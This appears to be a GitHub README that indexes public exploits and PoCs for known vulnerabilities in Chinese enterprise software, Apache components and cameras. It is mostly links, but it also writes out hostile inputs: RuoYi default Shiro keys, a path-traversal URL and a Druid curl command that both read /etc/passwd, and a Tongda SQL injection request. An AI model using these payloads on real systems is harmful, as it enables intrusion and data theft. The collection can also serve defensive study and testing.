https://github.com/Awrrays/FrameVul

PoC collection: exploits for n-day vulnerabilities in frameworks

# FrameVul

## General

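- [Roundup of offensive vulnerabilities in mainstream vendors' products](https://github.com/r0eXpeR/supplier)
- [2021_Hvv vulnerabilities](https://github.com/hhroot/2021_Hvv)
- [CVE vulnerabilities in Java applications, 2022](https://github.com/HackJava/CVE2022)
- [Vulnerability database collection](https://github.com/cckuailong/vulbase)
- [Public advisories, exploits and scripts](https://github.com/pedrib/PoC)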
- [Goby POC](https://github.com/aetkrad/goby_poc)
- [nuclei-templates](https://github.com/projectdiscovery/nuclei-templates)
- [LiqunKit_](https://github.com/Liqunkit/LiqunKit_)
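- [PoC library that extends fscan's vulnerability scanning](https://github.com/chaosec2021/fscan-POC)
- [Quickly detect high-risk vulnerabilities in common middleware and components during penetration tests.](https://github.com/1120362990/vulnerability-list)
- [OAExploit: a product-based one-click scanning tool](https://github.com/achuna33/MYExploit)
- [Batch scanning and cracking of common vulnerabilities in Hikvision, Dahua and other cameras.](https://github.com/WhaleFell/CameraHack)
- [Webcam vulnerability detection scripts for Nmap (NSE, Nmap Scripting Engine)](https://github.com/foggyspace/NsePocsuite-lua)
- [Webcam vulnerability scanning tool](https://github.com/jorhelp/Ingram)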

## 1Panel

[1Panel loadfile backend file read vulnerability](https://peiqi.wgpsec.org/wiki/webapp/1Panel/1Panel%20loadfile%20%E5%90%8E%E5%8F%B0%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html)

## 奥威亚 Video Cloud Platform

[奥威亚 Video Cloud Platform: arbitrary file upload vulnerability in the VideoCover.aspx endpoint (with PoC)](https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247484789&idx=1&sn=7a1fb2328cb346e2651bea73ba7b37b5)

## 昂捷 ERP

[昂捷 ERP: SQL injection in multiple endpoints (0day)](https://mp.weixin.qq.com/s/r-m73kfEOgq93LP1t0fXoA)

## BT Panel (宝塔)

[BT Panel for Windows privilege escalation method](https://github.com/Hzllaga/BT_Panel_Privilege_Escalation)

[BT Panel for Linux < 6.0 stored XSS](https://mp.weixin.qq.com/s/gtYyyhye90ZPILWCGsGKGQ)

## 百卓网络 Smart

[百卓网络 Smart S20 file upload vulnerability](https://github.com/flyyue2001/cve/blob/main/smart_sql_updateos.md)

## 辰信领创

[辰信景云 Endpoint Security Management System: SQL injection vulnerability in login](https://peiqi.wgpsec.org/wiki/webapp/%E8%BE%B0%E4%BF%A1%E9%A2%86%E5%88%9B/%E8%BE%B0%E4%BF%A1%E9%A2%86%E5%88%9B%20%E8%BE%B0%E4%BF%A1%E6%99%AF%E4%BA%91%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html)

## DingTalk (钉钉)

[DingTalk RCE](https://github.com/crazy0x70/dingtalk-RCE)

## eYou Email System (亿邮)

[(CNVD-2021-26422) eYou email system remote command execution vulnerability](https://github.com/Henry4E36/eyouRCE)

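## Weaver OA (泛微)

[SQL injection vulnerability in a certain version of Weaver OA](https://github.com/Wrin9/weaverOA_sql_injection)

[Application security - software vulnerabilities - Weaver OA vulnerability roundup](https://www.cnblogs.com/AtesetEnginner/p/11558469.html)

[Weaver e-mobile related vulnerabilities](https://mp.weixin.qq.com/s/nYTXWXs-40oR41k1UsHJyw)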

[z1un/weaver_exp](https://github.com/z1un/weaver_exp)

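[Short notes on expression injection](https://zhuanlan.zhihu.com/p/26052235)

[Weaver E-Mobile OGNL expression injection](https://blog.csdn.net/qq_27446553/article/details/68203308)

[The havoc caused by a SOAP injection in Weaver e-cology 7.1](https://www.mrwu.red/web/1598.html)

[SQL injection in Weaver's collaborative commerce system e-cology](https://www.uedbox.com/post/14232/)

[Reproducing the remote code execution vulnerability in the Weaver e-cology OA BeanShell component](https://mp.weixin.qq.com/s/LpXiLukOKMfMSa8gUYBqNA)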

[ecology8_mobile_sql_inject](https://github.com/orleven/Tentacle/blob/6e1cecd52b10526c4851a26249339367101b3ca2/script/ecology/ecology8_mobile_sql_inject.py)

[Weaver E-Cology WorkflowServiceXml RCE](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/泛微OA/泛微E-Cology%20WorkflowServiceXml%20RCE.html?h=泛微E-Cology%20WorkflowServiceXml%20RCE)

[Weaver OA weaver.common.Ctrl arbitrary file upload vulnerability](https://mp.weixin.qq.com/s/ePYRFPfu-pvWMKSiffporA)

[Reproducing a front-end GetShell in Weaver OA](https://ailiqun.xyz/2021/05/02/泛微OA-前台GetShell复现/)

[Weaver e-cology arbitrary file upload (fixed)](https://mp.weixin.qq.com/s/3ip7-U8BsWgq3N4SP5xd4w)

[Weaver e-cology arbitrary file upload via another endpoint (fixed)](https://mp.weixin.qq.com/s/nRnNyFfDQYxmFwA-7-IBVQ)

[OfficeServer file upload](https://github.com/sobinge/2022-HW-POC/blob/main/泛微OA%20uploaderOperate.jsp%20文件上传.md)

[E-office Server_v9.0 vulnerability analysis](https://mp.weixin.qq.com/s/JP-kIsWeQ0HZPs9jZjL24A)

[Reproducing an arbitrary file upload vulnerability in a certain E-Office v9](https://www.o2oxy.cn/3860.html)

[bigsizeme/CNVD-2021-49104](https://github.com/bigsizeme/CNVD-2021-49104)

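[Weaver OA exploitation tool](https://github.com/TD0U/WeaverScan)

[Chains a Weaver information disclosure vulnerability with an arbitrary user login vulnerability to obtain all loginIds and test logins](https://github.com/A0WaQ4/Weaver_ofslogin_vul)

[Arbitrary file upload in the lang2sql endpoint of the Weaver mobile management platform E-mobile](https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247484476&idx=1&sn=2eeef68570e6ab7d8a2789e07b8609ad)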

## FineReport (帆软报表)

[FineReport v8.0 Getshell vulnerability analysis](http://foreversong.cn/archives/1378)

[FineReport v8.0 arbitrary file read vulnerability CNVD-2018-04757](https://mp.weixin.qq.com/s/ae8A8PGJCtr6uS11dRpzcw)

[FineReport V9 getshell](https://www.o2oxy.cn/3368.html)

## 飞企互联

[飞企互联 FE Business Collaboration Platform ShowImageServlet arbitrary file read vulnerability](https://peiqi.wgpsec.org/wiki/webapp/%E9%A3%9E%E4%BC%81%E4%BA%92%E8%81%94/%E9%A3%9E%E4%BC%81%E4%BA%92%E8%81%94%20FE%E4%B8%9A%E5%8A%A1%E5%8D%8F%E4%BD%9C%E5%B9%B3%E5%8F%B0%20ShowImageServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html)

[飞*互联 login bypass code analysis](https://mp.weixin.qq.com/s?__biz=MzIyNjk0ODYxMA==&mid=2247487275&idx=1&sn=4031748decc2d11fdffea2650ddaa1b0)

## 好视通 Video Conferencing

[Arbitrary file read vulnerability in a certain "某某通" video conferencing product](https://mp.weixin.qq.com/s?__biz=MzkwODMzOTA2NA==&mid=2247492873&idx=1&sn=6e9798e0a06b1cf92cb669c2178a13e1)

## 汉得 SRM

[汉得 SRM tomcat.jsp login bypass vulnerability](https://peiqi.wgpsec.org/wiki/webapp/%E6%B1%89%E5%BE%97/%E6%B1%89%E5%BE%97SRM%20tomcat.jsp%20%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.html)

## 华天动力 OA

[CVE-2021-45897: analysis and reproduction of the remote command execution vulnerability in SuiteCRM, the world's largest CRM system](https://mp.weixin.qq.com/s/KVVgiECEr7ivBfXnByi5RQ)

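## Kingdee Cloud Galaxy (金蝶云星空)

[Kingdee Cloud Galaxy arbitrary file upload vulnerability](https://blog.csdn.net/qq_41904294/article/details/134204734)

[Kingdee Cloud Galaxy management center: arbitrary file upload vulnerability in the ScpSupRegHandler endpoint (with PoC)](https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247484562&idx=1&sn=fdd093b972b20fc842b110ac1cec75db)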

## 金盘 WeChat Management Platform

[金盘 WeChat Management Platform getsysteminfo unauthorized access vulnerability](https://peiqi.wgpsec.org/wiki/webapp/%E9%87%91%E7%9B%98/%E9%87%91%E7%9B%98%20%E5%BE%AE%E4%BF%A1%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20getsysteminfo%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.html)

## Kingsoft Endpoint Security System

[Kingsoft Endpoint Security System V9.0 SQL injection vulnerability](https://github.com/luck-ying/Library-POC/blob/40f8d4051a239ac9b49c77ea0152c394e8b38acb/%E9%87%91%E5%B1%B1%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F/%E9%87%91%E5%B1%B1%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9FV9.0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.py)

## Landray OA (蓝凌)

[yuanhaiGreg/LandrayExploit](https://github.com/yuanhaiGreg/LandrayExploit)

[Encryption/decryption tool for Landray OA front-end and backend passwords](https://github.com/zhutougg/LandrayDES)

[Landray OA custom.jsp arbitrary file read vulnerability](https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw)

[Escalating a front-end SSRF in 蓝某 OA to RCE](https://mp.weixin.qq.com/s/fNovp4mbKIMkVdF2ywcQcQ)

[Landray OA treexml.tmpl script remote code execution vulnerability](https://github.com/tangxiaofeng7/Landray-OA-Treexml-Rce)

[Landray EIS saveIm file upload](https://github.com/MzzdToT/HAC_Bored_Writing/blob/main/Fileupload/%E8%93%9D%E5%87%8CEIS/EIS_upload.py)

## Leagsoft (联软) Network Access Control System

[Leagsoft Network Access Control System arbitrary file upload](https://www.hedysx.com/2627.html)

## NSFOCUS NF Next-Generation Firewall

[NSFOCUS NF Next-Generation Firewall arbitrary file upload vulnerability](https://peiqi.wgpsec.org/wiki/webapp/%E7%BB%BF%E7%9B%9F/%E7%BB%BF%E7%9B%9F%20NF%E4%B8%8B%E4%B8%80%E4%BB%A3%E9%98%B2%E7%81%AB%E5%A2%99%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

## Qiyuesuo (契约锁)

[Exploitation: injecting a memory shell in practice via a code execution vulnerability in 某某锁](https://1oecho.github.io/oYmYrVh51/)

## 企望 Manufacturing ERP

[企望 Manufacturing ERP comboxstore.action remote command execution vulnerability](https://peiqi.wgpsec.org/wiki/webapp/%E4%BC%81%E6%9C%9B/%E4%BC%81%E6%9C%9B%E5%88%B6%E9%80%A0%20ERP%20comboxstore.action%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html)

## Ruijie (锐捷)

[Ruijie NBR router fileupload.php arbitrary file upload vulnerability](https://peiqi.wgpsec.org/wiki/iot/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7%20NBR%20%E8%B7%AF%E7%94%B1%E5%99%A8%20fileupload.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

[Ruijie BCR commercial wireless cloud gateway backend command execution vulnerability](https://peiqi.wgpsec.org/wiki/iot/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7%20BCR%E5%95%86%E4%B8%9A%E6%97%A0%E7%BA%BF%E4%BA%91%E7%BD%91%E5%85%B3%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html)

## RuoYi (若依)

Default keys

```
fCq+/xW488hMTCD+cmJ3aQ==
zSyK5Kp6PZAAjlT+eeNMlg==
```

Backend arbitrary file read

- RuoYi <= v4.5.0

```
/common/download/resource?resource=/profile/../../../../etc/passwd
```

Druid unauthorized access

```
/prod-api/druid/index.html
```

[One-click exploitation of RuoYi backend scheduled tasks](https://github.com/passer-W/Ruoyi-All)

[Xcheck Java engine: vulnerability discovery & protection identification](https://mp.weixin.qq.com/s/FPMUVoSqc0Lsf5BQx07ADw)

[Notes on getting a shell through the RuoYi CMS backend](https://bkfish.gitee.io/2021/06/26/记一次若依cms后台getshell/)

[yaml-payload for Windows reverse shells](https://github.com/bkfish/yaml-payload-for-Win)

[RuoYi CMS 4.6.0 backend RCE](https://www.cnblogs.com/r00tuser/p/14693462.html)

[RuoYi CMS backend getshell](http://www.yongsheng.site/2021/08/31/若依CMS后台getshell/)

## Sangfor (深信服)

[Sangfor Application Delivery Management System login remote command execution vulnerability](https://peiqi.wgpsec.org/wiki/webapp/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html)

## Tongda OA (通达)

[Multiple SQL injection vulnerabilities in Tongda OA](https://mp.weixin.qq.com/s/DcwDz11f6g7uguuBGsin7A)

[OA-HUNTER/TongDa-OA](https://github.com/OA-HUNTER/TongDa-OA)

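[Tongda OA all-in-one exploitation tool](https://github.com/xinyu2428/TDOA_RCE)

[Python exploits for several common Tongda vulnerabilities](https://github.com/kitezzzGrim/tongda-exp)

[Reproducing the SQL injection in the Tongda OA V11.5 email interface](https://mp.weixin.qq.com/s/3JtV-oVGIyzy9ly6n4fMiA)

[Tongda OA arbitrary file upload and file inclusion leading to RCE: detailed code audit analysis, PoC construction and reproduction](https://www.freebuf.com/column/230871.html)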

[jas502n/OA-tongda-RCE](https://github.com/jas502n/OA-tongda-RCE)

[Tongda OA 11.6 preauth RCE 0day analysis](https://drivertom.blogspot.com/2020/08/oa116-preauth-rce-0day.html)

[poc_and_exp/rce.py](https://github.com/TomAPU/poc_and_exp/blob/master/rce.py)

[Tongda OA v11.7 backend SQL injection to RCE 0day](https://mp.weixin.qq.com/s/rtX9mJkPHd9njvM_PIrK_Q)

[Tongda OA v11.7 online user login vulnerability](https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ)

[New ways to exploit Tongda OA 11.7 (with EXP)](https://mp.weixin.qq.com/s/LJRI04VViL4hbt6dbmGHAw)

[A new approach to backend getshell in Tongda OA](https://www.o2oxy.cn/2738.html)

[Analysis of a chained RCE exploit in Tongda OA 11.7](https://sec-in.com/article/921)

[Tongda OA v11.8 stored XSS and command execution](https://www.tooltool.net/2710355.html)

[Tongda OA code audit, part 2: 11.8 backend Getshell](https://paper.seebug.org/1499/)

[Tongda OA 11.8 backend getshell](https://github.com/z1un/TongdaOA-exp)

[Tongda OA-V11.8-api-ali.php file upload vulnerability](https://www.cnblogs.com/hmesed/p/16195551.html)

Tongda OA v11.9 upsharestatus backend SQL injection vulnerability

```
POST /general/appbuilder/web/portal/workbench/upsharestatus HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uid=15&status=1&id=1;select sleep(4)
```

[Getshell approach for recent versions of a well-known OA (with partial scripts)](https://mp.weixin.qq.com/s/HU-KxA75PR3u47QOqKWktQ)

[Reproducing the Tongda OA v11.10 SQL injection vulnerability](https://www.yulate.com/303.html)

## 网神

[网神 SecGate 3600 firewall obj_app_upfile arbitrary file upload vulnerability](https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

## 网御 ACM Internet Behavior Management System

[网御 ACM Internet Behavior Management System bottomframe.cgi SQL injection vulnerability](https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E5%BE%A1%20ACM%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20bottomframe.cgi%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html)

## 万户 OA

- [万户 OA smartUpload.jsp arbitrary file upload vulnerability](https://anpaini.com/2022/OA产品漏洞/万户OA%20smartUpload.jsp%20任意文件上传漏洞/)
- [Reproducing the 万户 OA upload arbitrary file upload vulnerability](https://blog.csdn.net/qq_41904294/article/details/134515628)

## Xinhu OA (信呼)

[Reproducing the Xinhu OA stored XSS 0day](https://xz.aliyun.com/t/7887)

## 云时空 Social Commerce ERP System

[云时空 Social Commerce ERP System gpy arbitrary file upload vulnerability RCE](https://mp.weixin.qq.com/s?__biz=MzkyOTQ1MjQwMw==&mid=2247483863&idx=1&sn=fca9ddbb361c88112279929d5c25065b)

## Yonyou NC (用友)

[Yonyou NC database password decryption](https://github.com/jas502n/ncDecode)

[kezibei/yongyou_nc_poc](https://github.com/kezibei/yongyou_nc_poc)

[Yonyou GRP-U8 administrative and public-institution financial management software SQL injection CNNVD-201610-923](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/用友OA/用友GRP-U8行政事业财务管理软件%20SQL注入%20CNNVD-201610-923.html)

[Brief notes on Yonyou NC deserialization vulnerabilities (DeleteServlet, XbrlPersistenceServlet, etc.)](https://www.jianshu.com/p/14449a6edd05)

[Yonyou NC XbrlPersistenceServlet deserialization](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/用友OA/用友%20NC%20XbrlPersistenceServlet反序列化.html)

[Weaponized exploitation of a 1-day deserialization vulnerability in 某C](https://mp.weixin.qq.com/s/IdXYbjNVGVIasuwQH48Q1w)

[Reproducing the Yonyou NC arbitrary file upload vulnerability](https://www.adminxe.com/2075.html)

[Approach to building response echo for Yonyou NC deserialization](https://zhzhdoai.github.io/2020/09/17/某NC-反序列化回显构造/)

[A brief analysis of Yonyou NC deserialization](https://blog.sari3l.com/posts/608d18f0/)

[CNVD-2022-60632: reproducing the Chanjet arbitrary file upload vulnerability](https://www.o2oxy.cn/4104.html)

[Yonyou NC Cloud jsinvoke arbitrary file upload vulnerability](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20NC%20Cloud%20jsinvoke%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

[Yonyou mobile management system uploadApk.do arbitrary file upload vulnerability](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20%E7%A7%BB%E5%8A%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20uploadApk.do%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

[Yonyou U8 CRM customer relationship management system getemaildata.php arbitrary file read vulnerability](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html)

[Yonyou U8 CRM customer relationship management system getemaildata.php arbitrary file upload vulnerability](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

## Yonyou U8Cloud

[Exploited in the wild: Yonyou U8-cloud SQL injection vulnerability](https://mp.weixin.qq.com/s?__biz=MzkxMTUwOTY1MA==&mid=2247483833&idx=1&sn=ff942057f579b746a56cd799c81f5064)

## Yonyou GRP

[Analysis of getshell via XXE in Yonyou GRP (with exp)](https://mp.weixin.qq.com/s?__biz=MzkxNjQyMjcwMw==&mid=2247485270&idx=1&sn=6d10fa9d349c3104bf317c5849e9f299)

## Seeyon OA (致远)

[Resetting the Seeyon OA administrator password](https://blog.csdn.net/qq_33064191/article/details/119921106)

[Database password decryption](https://github.com/Rvn0xsy/PassDecode-jar)

[Seeyon A8 login hash cracking case study](https://www.hedysx.com/2807.html)

[Summer177/seeyon_exp](https://github.com/Summer177/seeyon_exp)

[nex121/SeeyonEXP](https://github.com/nex121/SeeyonEXP)

[Reflected XSS & SSRF vulnerabilities in the FineReport component of Seeyon OA](https://landgrey.me/blog/7/)

[How the front-end XXE vulnerability in the FineReport component of Seeyon OA was found](https://landgrey.me/blog/8/)

[Seeyon A8 collaborative office system poc/seeyon 0day](https://www.jianshu.com/p/562f45edde2d)

[Seeyon OA A8 htmlofficeservlet getshell (POC&EXP)](http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/)

[Analysis of the Seeyon OA arbitrary administrator login vulnerability](https://mp.weixin.qq.com/s/tWKCgmptOsouOllDSXBTiw)

[Seeyon OA ajax.do login bypass and arbitrary file upload](https://mp.weixin.qq.com/s/dk6aZY2fuJ_08tSOOh1Vzw)

[Seeyon OA ajaxAction formulaManager file upload vulnerability](https://mp.weixin.qq.com/s/ZyPwCytO7NLUuo9rfKtgyQ)

[Reproducing the Seeyon OA fastjson remote code execution vulnerability](https://mp.weixin.qq.com/s/a1KbLlb7ZOXfeXUyhLhpMw)

[Seeyon pseudo-0day: FastJson exploit chain](https://mp.weixin.qq.com/s/yTuQLqqvikwo1KfK-zGBBA)

[Seeyon OA FastJson RCE with response echo](https://96.mk/2021/07/10/19.html)

[Analysis of getshell via XXE in Seeyon OA (with script)](https://mp.weixin.qq.com/s/efuMlGrjYsUjP7nP3W2F4w)

[Front-end remote code execution vulnerability in 某远 M3](https://xz.aliyun.com/t/13078)

[Reproducing the Seeyon M3-server deserialization RCE vulnerability (with POC)](https://mp.weixin.qq.com/s?__biz=MzU1ODQ2NTY3Ng==&mid=2247484745&idx=1&sn=98c5d18f55ff883a186ce0a5527c2c64)

## 浙大恩特 Customer Resource Management System

[浙大恩特 Customer Resource Management System fileupload.jsp file upload](https://mp.weixin.qq.com/s/8BpPzi_7SfJWEQG5N988Mg)

[浙大恩特 CRM file upload (round two)](https://mp.weixin.qq.com/s/TUICrxb3HjTBxe175hI7Fg)

[Urgent warning: 某大科恩 CMR 0day](https://mp.weixin.qq.com/s?__biz=MzkxMDYwNDI0MA==&mid=2247483841&idx=1&sn=9e29324912fa755f24265ce0d6446e84)

## 74CMS

[74CMS (骑士 CMS) below 6.0.48: getshell via file inclusion](https://mp.weixin.qq.com/s/erBzIapx1bz8f1ArWwwBwQ)

## Adminer

[Adminer ≤ 4.6.2 arbitrary file read vulnerability](https://mp.weixin.qq.com/s/ZYGN8WceT2L-P4yF6Z8gyQ)

## Apache

[Bypassing upload blacklists with the latest Apache parsing vulnerability (CVE-2017-15715)](https://www.leavesongs.com/PENETRATION/apache-cve-2017-15715-vulnerability.html)

[Apache HTTPD newline parsing vulnerability (CVE-2017-15715)](https://vulhub.org/#/environments/httpd/CVE-2017-15715/)

[Apache SSI remote command execution vulnerability](https://vulhub.org/#/environments/httpd/ssi-rce/)

[Reproducing the Apache privilege escalation vulnerability (CVE-2019-0211)](https://paper.seebug.org/889/)

[Latest vulnerability alert: CVE-2021-40438, in-depth analysis and reproduction of the Apache httpd mod_proxy SSRF vulnerability](https://mp.weixin.qq.com/s/tYM6z9S1WZjPjfCt2MHOAQ)

[Some analysis of and extensions to the Apache mod_proxy SSRF (CVE-2021-40438)](https://mp.weixin.qq.com/s/sbFs7kZ8tExwZPeUvq1hJw)

[CVE-2021-41773 | CVE-2021-42013 exploitation tool (Apache/2.4.49-2.4.50)](https://github.com/CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit)

[Bypassing the patch for the Apache arbitrary file read (CVE-2021-42013)](https://mp.weixin.qq.com/s/UzKu4mze02umEhxJAJpp9g)

[Reproducing Apache 2.4.50 CVE-2021-41773 and CVE-2021-42013](https://www.o2oxy.cn/3740.html)

## Apache ActiveMQ

[Roundup and reproduction of the ActiveMQ vulnerability series](https://mp.weixin.qq.com/s/5U7v22q2WeLmCnkq7mfr8w)

[ActiveMQ deserialization vulnerability (CVE-2015-5254)](https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md)

[ActiveMQ arbitrary file write vulnerability (CVE-2016-3088)](https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2016-3088/README.zh-cn.md)

[ActiveMQ RCE](https://github.com/trganda/ActiveMQ-RCE)

[CVE-2023-46604: ActiveMQ RCE vulnerability verification/exploitation tool](https://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247485403&idx=2&sn=0cdcd266b4761c8ee0ff57bb0b399b08)

## Apache Airflow

[Mr-xn/CVE-2022-40127](https://github.com/Mr-xn/CVE-2022-40127)

## Apache APISIX

[CVE-2022-24112 Apache APISIX apisix/batch-requests RCE](https://github.com/Mr-xn/CVE-2022-24112/blob/main/CVE-2022-24112.yaml)

[Apisix dashboard: from unauthorized access to RCE, including how the PoC was found & a reproduction environment](https://mp.weixin.qq.com/s/knTotxOeFlzcxvoQYSljCQ)

## Apache Axis

[Summary of exploiting Apache Axis1 and Axis2 WebService vulnerabilities](https://paper.seebug.org/1489/#2-apache-axis2)

[axis 1.4 AdminService unauthorized access: JNDI injection exploitation](https://jianfensec.com/渗透测试/axis 1.4 AdminService未授权访问 jndi注入命令执行利用/)

[KibodWapon/Axis-1.4-RCE-Poc](https://github.com/KibodWapon/Axis-1.4-RCE-Poc)

[Vulnerability reproduction: Axis2 default weak password backend Getshell](https://mp.weixin.qq.com/s/Gp_FMM-n472wYTBA5lC3lw)

## Apache Druid

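[Apache Druid vulnerability summary](https://mp.weixin.qq.com/s/ZT5j9clfENsEWMSKuKkw1g)

[Some ways to exploit Druid unauthorized access (weak passwords)](https://www.cnblogs.com/cwkiller/p/12483223.html)

[Exploiting the Druid unauthorized access vulnerability in practice](https://www.t00ls.net/articles-62541.html)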

[yuyan-sec/druid_sessions](https://github.com/yuyan-sec/druid_sessions)

[Apache Druid remote code execution vulnerability CVE-2021-25646](http://wiki.peiqi.tech/PeiQi_Wiki/Web服务器漏洞/Apache/Apache Druid/Apache Druid 远程代码执行漏洞 CVE-2021-25646.html)

[Vulnerability reproduction: Apache Druid remote code execution vulnerability (CVE-2021-25646)](https://paper.seebug.org/1476/)

[Apache Druid CVE-2021-26919 vulnerability analysis](http://m0d9.me/2021/04/21/Apache-Druid-CVE-2021-26919-漏洞分析/)

CVE-2021-36749

```sh
curl http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect -H "Content-Type:application/json" -X POST -d "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}"
```

## Apache Dubbo

[Engineering practice for exploiting Apache Dubbo (CVE-2023-23638)](https://github.com/YYHYlh/Apache-Dubbo-CVE-2023-23638-exp)

## Apache Flink

[CVE-2020-17518 & 17519: reproducing two Flink vulnerabilities](https://mp.weixin.qq.com/s/9xLQ1YAWVtHBv9qVk-Xc1A)

[Vulnerability reproduction | Apache Flink (CVE-2020-17519) vulnerability analysis](https://mp.weixin.qq.com/s/6Z7ilX_bwSBU8EWfStAc5w)

## Apache Kylin

[CVE-2021-45456 Apache Kylin command execution](https://github.com/Awrrays/Awrrays-Team-VulLab/blob/main/Middleware/apache/Apache Kylin/CVE-2021-45456.md)

## Apache Solr

[Solr RCE roundup](https://github.com/Imanfeng/Apache-Solr-RCE)

[Apache Solr injection research](https://github.com/veracode-research/solr-injection)

[Apache Solr XML entity injection vulnerability (CVE-2017-12629)](https://vulhub.org/#/environments/solr/CVE-2017-12629-XXE/)

[Apache Solr remote command execution vulnerability (CVE-2017-12629)](https://vulhub.org/#/environments/solr/CVE-2017-12629-RCE/)

https://github.com/mpgn/CVE-2019-0192/

[Apache Solr remote command execution vulnerability (CVE-2019-0193)](https://vulhub.org/#/environments/solr/CVE-2019-0193/)

[Analysis of the Apache Solr DataImportHandler remote code execution vulnerability (CVE-2019-0193)](https://paper.seebug.org/1009/)

[jas502n/CVE-2019-0193](https://github.com/jas502n/CVE-2019-0193)

[Reproducing the Apache Solr insecure-configuration remote code execution vulnerability and analysing JMX RMI exploitation](https://mp.weixin.qq.com/s/P626BC3-JcBc3ewdlslO2w)

[jas502n/CVE-2019-12409](https://github.com/jas502n/CVE-2019-12409)

[Reproducing the latest Apache Solr vulnerability](https://xz.aliyun.com/t/6679)

